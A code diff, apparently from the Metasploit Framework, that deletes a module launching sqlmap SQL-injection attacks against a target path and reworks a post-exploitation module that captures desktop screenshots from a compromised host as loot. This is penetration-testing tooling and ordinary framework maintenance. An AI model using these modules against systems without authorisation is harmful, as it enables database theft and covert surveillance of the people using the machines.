parent
f12171d1a0
commit
460a1f551c
|
@ -1,112 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::WmapScanUniqueQuery
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sqlmap SQL Injection External Module',
|
||||
'Description' => %q{
|
||||
This module launches a sqlmap session.
|
||||
Sqlmap is an automatic SQL injection tool developed in Python.
|
||||
Its goal is to detect and take advantage of SQL injection
|
||||
vulnerabilities on web applications. Once it detects one
|
||||
or more SQL injections on the target host, the user can
|
||||
choose among a variety of options to perform an extensive
|
||||
back-end database management system fingerprint, retrieve
|
||||
DBMS session user and database, enumerate users, password
|
||||
hashes, privileges, databases, dump entire or user
|
||||
specific DBMS tables/columns, run his own SQL SELECT
|
||||
statement, read specific files on the file system and much
|
||||
more.
|
||||
},
|
||||
'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://sqlmap.sourceforge.net'],
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPath.new('SQLMAP_PATH', [ true, "The sqlmap >= 0.6.1 full path ", '/sqlmap' ]),
|
||||
OptEnum.new('METHOD', [true, 'HTTP Method', 'GET', ['GET', 'POST']]),
|
||||
OptString.new('PATH', [ true, "The path/file to test for SQL injection", 'index.php' ]),
|
||||
OptString.new('QUERY', [ false, "HTTP GET query", 'id=1' ]),
|
||||
OptString.new('DATA', [ false, "The data string to be sent through POST" ]),
|
||||
OptString.new('OPTS', [ false, "The sqlmap options to use" ]),
|
||||
OptBool.new('BATCH', [ true, "Never ask for user input, use the default behaviour", true ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Modify to true if you have sqlmap installed.
|
||||
def wmap_enabled
|
||||
false
|
||||
end
|
||||
|
||||
# Test a single host
|
||||
def run_host(ip)
|
||||
|
||||
sqlmap = File.join(datastore['SQLMAP_PATH'], 'sqlmap.py')
|
||||
unless File.file?(sqlmap)
|
||||
print_error("The sqlmap script '#{sqlmap}' could not be found")
|
||||
return
|
||||
end
|
||||
unless File.readable?(sqlmap)
|
||||
print_error("The sqlmap script '#{sqlmap}' is not readable")
|
||||
return
|
||||
end
|
||||
unless File.executable?(sqlmap)
|
||||
print_error("The sqlmap script '#{sqlmap}' is not executable")
|
||||
return
|
||||
end
|
||||
|
||||
data = ""
|
||||
data << datastore['DATA'].to_s
|
||||
opts = datastore['OPTS']
|
||||
method = datastore['METHOD'].upcase
|
||||
|
||||
wmap_target_host = datastore['VHOST'] if datastore['VHOST']
|
||||
|
||||
sqlmap_url = (datastore['SSL'] ? "https" : "http")
|
||||
sqlmap_url << "://"
|
||||
sqlmap_url << wmap_target_host
|
||||
sqlmap_url << ":"
|
||||
sqlmap_url << wmap_target_port.to_s
|
||||
sqlmap_url << "/"
|
||||
sqlmap_url << datastore['PATH']
|
||||
|
||||
if method == "GET"
|
||||
sqlmap_url << '?'
|
||||
sqlmap_url << datastore['QUERY']
|
||||
elsif method == "POST"
|
||||
data << "&"
|
||||
data << datastore['QUERY']
|
||||
end
|
||||
|
||||
cmd = [ sqlmap ]
|
||||
cmd += [ '-u', sqlmap_url ]
|
||||
if opts
|
||||
cmd << opts
|
||||
end
|
||||
if data
|
||||
cmd += [ '--data', data ]
|
||||
end
|
||||
if datastore['BATCH'] == true
|
||||
cmd << '--batch'
|
||||
end
|
||||
|
||||
print_status("exec: #{cmd.inspect}")
|
||||
system(*cmd)
|
||||
end
|
||||
|
||||
end
|
|
@ -14,11 +14,11 @@ class Metasploit3 < Msf::Post
|
|||
This module will incrementally take desktop screenshots from the host. This
|
||||
allows for screen spying which can be useful to determine if there is an active
|
||||
user on a machine, or to record the screen for later data extraction.
|
||||
NOTES: set VIEW_CMD to control how screenshots are opened/displayed, the file name
|
||||
will be appended directly on to the end of the value of VIEW_CMD (use 'auto' to
|
||||
have the module do it's best...default browser for Windows, firefox for *nix, and
|
||||
preview app for macs). 'eog -s -f -w' is a handy VIEW_CMD for *nix. To suppress
|
||||
opening of screenshots all together, set the VIEW_CMD option to 'none'.
|
||||
|
||||
Note: As of March, 2014, the VIEW_CMD option has been removed in
|
||||
favor of the Boolean VIEW_SCREENSHOTS option, which will control if (but
|
||||
not how) the collected screenshots will be viewed from the Metasploit
|
||||
interface.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -36,11 +36,19 @@ class Metasploit3 < Msf::Post
|
|||
[
|
||||
OptInt.new('DELAY', [true, 'Interval between screenshots in seconds', 5]),
|
||||
OptInt.new('COUNT', [true, 'Number of screenshots to collect', 6]),
|
||||
OptString.new('VIEW_CMD', [false, 'Command to use for viewing screenshots (auto, none also accepted)', 'auto']),
|
||||
OptBool.new('RECORD', [true, 'Record all screenshots to disk by looting them',false])
|
||||
OptBool.new('VIEW_SCREENSHOTS', [false, 'View screenshots automatically', false]),
|
||||
OptBool.new('RECORD', [true, 'Record all screenshots to disk by looting them', true])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def view_screenshots?
|
||||
datastore['VIEW_SCREENSHOTS']
|
||||
end
|
||||
|
||||
def record?
|
||||
datastore['RECORD']
|
||||
end
|
||||
|
||||
def run
|
||||
host = session.session_host
|
||||
screenshot = Msf::Config.get_config_root + "/logs/" + host + ".jpg"
|
||||
|
@ -58,25 +66,6 @@ class Metasploit3 < Msf::Post
|
|||
return
|
||||
end
|
||||
|
||||
# here we check for the local platform to determine what to do when 'auto' is selected
|
||||
if datastore['VIEW_CMD'].downcase == 'auto'
|
||||
case ::RbConfig::CONFIG['host_os']
|
||||
when /mac|darwin/
|
||||
cmd = "open file://#{screenshot}" # this will use preview usually
|
||||
when /mswin|win|mingw/
|
||||
cmd = "start iexplore.exe \"file://#{screenshot}\""
|
||||
when /linux|cygwin/
|
||||
# This opens a new tab for each screenshot, but I don't see a better way
|
||||
cmd = "firefox file://#{screenshot} &"
|
||||
else # bsd/sun/solaris might be different, but for now...
|
||||
cmd = "firefox file://#{screenshot} &"
|
||||
end
|
||||
elsif datastore['VIEW_CMD'].downcase == 'none'
|
||||
cmd = nil
|
||||
else
|
||||
cmd = "#{datastore['VIEW_CMD']}#{screenshot}"
|
||||
end
|
||||
|
||||
begin
|
||||
count = datastore['COUNT']
|
||||
print_status "Capturing #{count} screenshots with a delay of #{datastore['DELAY']} seconds"
|
||||
|
@ -92,20 +81,29 @@ class Metasploit3 < Msf::Post
|
|||
return false
|
||||
end
|
||||
if data
|
||||
if datastore['RECORD']
|
||||
|
||||
if record?
|
||||
# let's loot it using non-clobbering filename, even tho this is the source filename, not dest
|
||||
fn = "screenshot.%0#{leading_zeros}d.jpg" % num
|
||||
file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot")
|
||||
end
|
||||
|
||||
# also write to disk temporarily so we can display in browser. They may or may not have been RECORDed.
|
||||
if cmd # do this if they have not suppressed VIEW_CMD display
|
||||
# also write to disk temporarily so we can display in browser.
|
||||
# They may or may not have been RECORDed.
|
||||
# do this if they have not suppressed VIEW_SCREENSHOT display
|
||||
if view_screenshots?
|
||||
fd = ::File.new(screenshot, 'wb')
|
||||
fd.write(data)
|
||||
fd.close
|
||||
end
|
||||
|
||||
end
|
||||
system(cmd) if cmd
|
||||
|
||||
if view_screenshots?
|
||||
screenshot_path = "file://#{screenshot}"
|
||||
Rex::Compat.open_browser(screenshot_path)
|
||||
end
|
||||
|
||||
end
|
||||
rescue IOError, Errno::ENOENT => e
|
||||
print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}")
|
||||
|
@ -115,9 +113,11 @@ class Metasploit3 < Msf::Post
|
|||
if file_locations and not file_locations.empty?
|
||||
print_status "run loot -t screenspy.screenshot to see file locations of your newly acquired loot"
|
||||
end
|
||||
if cmd
|
||||
|
||||
if view_screenshots?
|
||||
# wait 2 secs so the last file can get opened before deletion
|
||||
select(nil, nil, nil, 2)
|
||||
sleep 2
|
||||
vprint_status "Deleting temporary screenshot file: #{screenshot}"
|
||||
begin
|
||||
::File.delete(screenshot)
|
||||
rescue Exception => e
|
||||
|
@ -125,6 +125,7 @@ class Metasploit3 < Msf::Post
|
|||
print_error("This may be due to the file being in use if you are on a Windows platform")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def migrate_explorer
|
||||
|
|
Loading…
Reference in New Issue